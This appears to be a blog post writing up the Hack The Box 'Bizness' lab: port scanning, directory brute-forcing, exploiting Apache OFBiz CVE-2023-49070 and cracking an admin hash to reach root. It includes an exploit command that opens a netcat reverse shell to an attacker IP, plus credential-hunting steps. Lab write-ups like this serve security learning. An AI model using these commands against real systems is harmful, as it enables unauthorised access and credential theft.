chirpy-starter/_posts/2024-01-01-bizness.md
2025-02-03 22:22:27 -06:00

2.6 KiB

title date categories tags image
HTB - Bizness 2024-08-13 12:17:34 -0400
hackthebox
Bizness
hackthebox
Apache
OFBiz
dirsearch
nmap
cracking
enumeration
hashcat
htb-bizness
ctf
CVE-2023-49070
linux
path lqip alt
/assets/img/post/bizness-card.png data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA Hack the Box - Bizness.

Box Info

Name Bizness
Release Date 06 Jan, 2024
OS Linux
Rated Difficulty Easy

Enumeration

nmap -p- --min-rate 5000 -n -sS -vvv -Pn 10.10.11.252 -oG allports
nmap -sCV -p 22,80,443,40117 10.10.11.252 -oN targeted

Image

Add the domain to /etc/hosts

echo "10.10.11.252 bizness.htb | sudo tee -a /etc/hosts/

Image

Brute Force Directory

dirsearch -u http://bizness.htb/

Image

OFBiz

The website is using a technology called OFBiz with version 18.12, the current version is out date.

Image

Apache OFBiz 18.12 CVE-2023-49070

Image

Apache-OFBiz-Authentication-Bypass

We used the exploit to authenticate ourselves.

python3 exploit.py --url  https://bizness.htb:443 --cmd 'nc -e /bin/bash 10.10.14.16 7777'
nc -lvnp 7777

Image

Enumeration linux

Before launching this search, I found a location where the OFBiz folder was located and performed searches that contain admin. I searched recursively using grep, using options like -Rail, and to specify the word I used -e.

grep -Rail -e 'admin$' /top/ofbiz/runtime/data/derby/ofbiz/seg0

Image

We came across a lot of data, so we have to go through each one by one.

We find a user and the hash

Image

Cracking Hash

We will use the Go hash matcher script to crack the password.

Go-Hash-Matcher

Image

Once we have the password, we log in at the root

Image